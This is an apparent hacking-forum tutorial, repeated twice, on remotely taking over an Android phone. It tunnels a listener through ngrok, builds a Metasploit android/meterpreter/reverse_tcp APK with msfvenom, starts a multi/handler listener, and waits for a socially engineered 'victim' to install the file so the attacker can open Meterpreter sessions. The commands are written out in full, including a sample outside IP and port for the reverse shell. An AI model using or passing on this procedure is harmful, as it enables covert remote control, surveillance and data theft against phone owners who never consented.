- by x32x01 ||
Android phones are very easy to break into if the victim can be Social Engineered into doing so. If you use Kali, you may have done this but probably in your own network. This guide shows you how to do so but over HTTP tunneling to a phone anywhere in the world.
Step 1 : Load Up Your Kali Shell
Load up your Kali Linux Shell
Step 2 : Download NGROK TCP Tunneling
It can be found here: https://ngrok.com/download. Download the correct architecture for your device.
(This can be found by running 'uname -m')
Then unzip the file with:
Step 3 : Sign Up
The sign up page can be found here: https://ngrok.com/signup. Then run the command to activate your AuthToken
Step 4 : Start an NGROK TCP Server and POSTGRESQL
We can do this with the following command
This will start a TCP server on port 4444
Step 5 : Make an MSF Payload
First of all, we need to ping the IP of the NGROK TCP site with the following command
Next we have to generate a Metasploit APK Payload with the following command
The ngrok port is displayed here:
Example:
Step 6 : Start a Listener
Once the Payload is generated we can start a listener. There should be an apk file ready for you to send now.
We can start a listener with this command:
Step 7 : Configure the Listener
To start the payload listener, we must now enter these commands:
Congrats! You have successfully created a payload listener!
Step 8 : Send the Payload
Now we must send the payload to the target, I have transferred the file to my android for these purpose
We need to wait for the victim to install the file.
Step 9 : ATTACK !
Now we have access to the android device. Type:
We can now do many different attacks on the android phone, type
to see a variety of attacks to perform
Happy Hacking!
Step 1 : Load Up Your Kali Shell
Load up your Kali Linux Shell
Step 2 : Download NGROK TCP Tunneling
It can be found here: https://ngrok.com/download. Download the correct architecture for your device.
(This can be found by running 'uname -m')
Then unzip the file with:
Bash:
unzip "/path-to-ngrok.zip"Step 3 : Sign Up
The sign up page can be found here: https://ngrok.com/signup. Then run the command to activate your AuthToken
Step 4 : Start an NGROK TCP Server and POSTGRESQL
We can do this with the following command
Bash:
sudo service postgresql start
./ngrok tcp 4444Step 5 : Make an MSF Payload
First of all, we need to ping the IP of the NGROK TCP site with the following command
Bash:
ping 0.tcp.ngrok.ioNext we have to generate a Metasploit APK Payload with the following command
Bash:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<ngrok ip> LPORT=<port displayed in ngrok> R > (name of file).apkThe ngrok port is displayed here:
Bash:
msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.183.149 LPORT= 8198 R > nullbyte.apkStep 6 : Start a Listener
Once the Payload is generated we can start a listener. There should be an apk file ready for you to send now.
We can start a listener with this command:
Bash:
msfconsoleStep 7 : Configure the Listener
To start the payload listener, we must now enter these commands:
Bash:
msf > use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploitCongrats! You have successfully created a payload listener!
Step 8 : Send the Payload
Now we must send the payload to the target, I have transferred the file to my android for these purpose
We need to wait for the victim to install the file.
Step 9 : ATTACK !
Now we have access to the android device. Type:
Bash:
sessions
sessions 1We can now do many different attacks on the android phone, type
Bash:
helpHappy Hacking!